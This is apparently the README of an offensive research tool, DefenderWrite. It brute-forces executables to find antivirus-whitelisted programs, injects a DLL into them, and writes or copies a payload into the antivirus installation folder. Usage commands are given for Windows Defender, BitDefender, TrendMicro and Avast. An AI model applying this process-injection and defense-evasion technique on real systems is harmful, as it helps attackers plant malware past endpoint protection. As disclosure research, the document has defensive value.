This is a tool that performs brute force on all executable files in the specified folder to identify files that are whitelisted by the Antivirus and have permission to write into the AV's executable folder.
DefenderWrite.exe <TargetExePath> <FullDLLPath> <FileToWrite>
DefenderWrite will execute the file at TargetExePath and inject the FullDLLPath DLL into the newly created process. The DLL will perform the action of creating the FileToWrite and will return a success or failure result.
DefenderWrite.exe <TargetExePath> <FullDLLPath> <FileToWrite> c
DefenderWrite will execute the file at TargetExePath and inject the FullDLLPath DLL into the newly created process. The DLL will perform the action of copying the FullDLLPath to the destination FileToWrite. This is applicable when you want to copy the payload into the installation folder of the Antivirus.
You can modify line 60 of the script to change parameters such as the path to DefenderWrite, FullDLLPath, and FileToWrite to suit the environment you need to test.
CMD (RunAs Administrator)
powershell -c "path to Run-Check.ps1" > result.txt
Check the output log file (result.txt) and look for executable files that have the result "successfully".
- Microsoft Windows Defender
- BitDefender Antivirus
- TrendMicro Antivirus Plus
- Avast Antivirus
DefenderWrite: Abusing Whitelisted Programs for Arbitrary Writes
We’re a team of researchers and developers keeping our lab running, renewing essential software licenses, upgrading aging equipment, and getting coffee to reduce stress. You can support us by buying a few books from our recommended list. Every purchase directly funds lab maintenance, software licenses, equipment upgrades, and provides very big morale boosts.
Books on Programming and Cybersecurity recommended by Zero Salarium Researchers